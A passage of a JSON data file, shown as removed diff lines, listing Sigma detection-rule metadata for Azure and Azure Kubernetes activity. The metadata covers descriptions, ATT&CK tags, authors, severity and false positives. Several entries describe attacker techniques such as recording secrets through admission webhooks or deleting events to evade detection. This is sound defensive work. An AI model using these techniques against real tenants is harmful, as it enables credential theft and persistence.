an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", - "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", - "value": "Application URI Configuration Changes", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_uri_modifications.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an account is disabled or blocked for sign in but tried to log in", - "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", - "value": "Account Disabled or Blocked for Sign in Attempts", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/06/17", - "filename": "azure_blocked_account_attempt.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "Account disabled or blocked in error", - "Automation account has been blocked or disabled" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", - "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", - "value": "Change to Authentication Method", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/10/10", - "filename": "azure_change_to_authentication_method.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", - "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", - "value": "Sign-in Failure Due to Conditional Access Requirements Not Met", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/06/01", - "filename": "azure_conditional_access_failure.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Service Account misconfigured", - "Misconfigured Systems", - "Vulnerability Scanners" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a Container Registry is created or deleted.", - "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", - "value": "Azure Container Registry Created or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_container_registry_created_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", - "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", - "value": "Number Of Resource Creation Or Deployment Activities", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" - ], - "tags": [ - "attack.t1098" - ], - "creation_date": "2020/05/07", - "filename": "azure_creating_number_of_resources_detection.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a device in azure is no longer managed or compliant", - "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", - "value": "Azure Device No Longer Managed or Compliant", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/03", - "filename": "azure_device_no_longer_managed_or_compliant.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Administrator may have forgotten to review the device." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a device or device configuration in azure is modified or deleted.", - "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", - "value": "Azure Device or Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/03", - "filename": "azure_device_or_configuration_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Device or device configuration being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when DNS zone is modified or deleted.", - "uuid": "af6925b0-8826-47f1-9324-337507a0babd", - "value": "Azure DNS Zone Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_dns_zone_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when an user or application modified the federation settings on the domain.", - "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", - "value": "Azure Domain Federation Settings Modified", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1078", - "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/09/06", - "filename": "azure_federation_modified.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Federation Settings being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a firewall is created, modified, or deleted.", - "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", - "value": "Azure Firewall Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_firewall_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", - "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", - "value": "Azure Firewall Rule Collection Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", - "value": "Granting Of Permissions To An Account", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" - ], - "tags": [ - "attack.t1098" - ], - "creation_date": "2020/05/07", - "filename": "azure_granting_permission_detection.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", - "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", - "value": "User Added To Group With CA Policy Modification Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/04", - "filename": "azure_group_user_addition_ca_modification.yml", - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "level": "medium", - "falsepositive": [ - "User removed from the group is approved" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", - "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", - "value": "User Removed From Group With CA Policy Modification Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/04", - "filename": "azure_group_user_removal_ca_modification.yml", - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "level": "medium", - "falsepositive": [ - "User removed from the group is approved" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", - "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", - "value": "Guest User Invited By Non Approved Inviters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/10", - "filename": "azure_guest_invite_failure.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "A non malicious user is unaware of the proper process" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", - "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", - "value": "User State Changed From Guest To Member", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/06/30", - "filename": "azure_guest_to_member.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", - "uuid": "80eeab92-0979-4152-942d-96749e11df40", - "value": "Azure Keyvault Key Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_key_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Key being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a key vault is modified or deleted.", - "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", - "value": "Azure Key Vault Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Key Vault being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when secrets are modified or deleted in Azure.", - "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", - "value": "Azure Keyvault Secrets Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ], - "creation_date": "2021/08/16", - "filename": "azure_keyvault_secrets_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", - "value": "Azure Kubernetes Admission Controller", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ], - "creation_date": "2021/11/25", - "filename": "azure_kubernetes_admission_controller.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Azure Kubernetes Admissions Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", - "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", - "value": "Azure Kubernetes Cluster Created or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_cluster_created_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", - "value": "Azure Kubernetes CronJob", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ], - "creation_date": "2021/11/22", - "filename": "azure_kubernetes_cronjob.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Azure Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", - "value": "Azure Kubernetes Events Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.t1562.001" - ], - "creation_date": "2021/07/24", - "filename": "azure_kubernetes_events_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", - "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", - "value": "Azure Kubernetes Network Policy Change", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_network_policy_change.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies the deletion of Azure Kubernetes Pods.", - "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", - "value": "Azure Kubernetes Pods Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/07/24", - "filename": "azure_kubernetes_pods_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", - "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", - "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", - "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", - "value": "Azure Kubernetes Sensitive Role Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_role_access.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", - "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", - "value": "Azure Kubernetes Secret or Config Object Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_secret_or_config_object_access.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service account is modified or deleted.", - "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", - "value": "Azure Kubernetes Service Account Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Alert on when legecy authentication has been used on an account", - "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", - "value": "Use of Legacy Authentication Protocols", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2022/06/17", - "filename": "azure_legacy_authentication_protocols.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "User has been put in acception group so they can use legacy authentication" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect failed attempts to sign in to disabled accounts.", - "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", - "value": "Login to Disabled Account", - "meta": { - "refs": [ - 